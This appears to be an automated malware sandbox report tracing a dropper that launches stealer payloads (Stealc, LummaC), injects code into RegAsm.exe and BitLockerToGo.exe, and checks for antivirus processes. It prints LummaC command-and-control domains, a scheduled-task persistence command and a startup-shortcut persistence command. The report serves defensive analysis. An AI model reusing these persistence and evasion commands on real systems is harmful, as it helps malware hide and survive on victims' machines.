Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\OmnqazpM3P.exe

Code function: 0_2_051F0C59 rdtsc

0_2_051F0C59

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_066A3EE0 LdrInitializeThunk,

9_2_066A3EE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00407AF1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_00407AF1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_001A645B mov eax, dword ptr fs:[00000030h]	6_2_001A645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_001AA1C2 mov eax, dword ptr fs:[00000030h]	6_2_001AA1C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041913C mov eax, dword ptr fs:[00000030h]	12_2_0041913C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00411496 mov ecx, dword ptr fs:[00000030h]	12_2_00411496

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0041EFC8 GetProcessHeap,

12_2_0041EFC8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00407AF1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00407AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00407C53 SetUnhandledExceptionFilter,	12_2_00407C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00407D65 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00407D65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040DD68 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0040DD68

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6624, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe

Code function: 7_2_02FC2555 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

7_2_02FC2555

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: caesium-image-compressor.exe, 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: caesium-image-compressor.exe, 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: caesium-image-compressor.exe, 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: caesium-image-compressor.exe, 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: caesium-image-compressor.exe, 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: caesium-image-compressor.exe, 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: caesium-image-compressor.exe, 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: caesium-image-compressor.exe, 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: caesium-image-compressor.exe, 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: femininedspzmhu.shop

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8FC008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 50B000
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9D5008
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2FD8008
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 440000
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 28BC008
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 438000
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43B000
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44A000

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe "C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe "C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe "C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe "C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe "C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\1000238002\Amadeus.exe "C:\Users\user\1000238002\Amadeus.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe "C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe "C:\Users\user\AppData\Roaming\6rxotqIg7H.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\1000238002\Amadeus.exe	Process created: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe "C:\Users\user\AppData\Local\Temp\1000262001\385107.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & echo url="c:\users\user\appdata\local\trackguard technologies\guardtrack.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & exit
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & echo url="c:\users\user\appdata\local\trackguard technologies\guardtrack.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & exit

Source: Shipment.pif, 00000023.00000002.3376622334.0000000000A86000.00000002.00000001.01000000.0000001D.sdmp, Shipment.pif, 00000023.00000003.3185890062.0000000003871000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000027E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000027E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow
Source: axplong.exe, axplong.exe, 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: UProgram Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_0018D312 cpuid

6_2_0018D312

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_0041E815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	12_2_00414128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	12_2_0041EA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_0041EB91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	12_2_0041E402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	12_2_0041EC97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_0041ED66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	12_2_0041E5FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	12_2_0041464E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	12_2_0041E6EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	12_2_0041E6A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	12_2_0041E78A

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000209001\whiteheroin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000209001\whiteheroin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000223001\openvpn12.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000223001\openvpn12.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\1000238002\Amadeus.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\1000238002\Amadeus.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Queries volume information: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
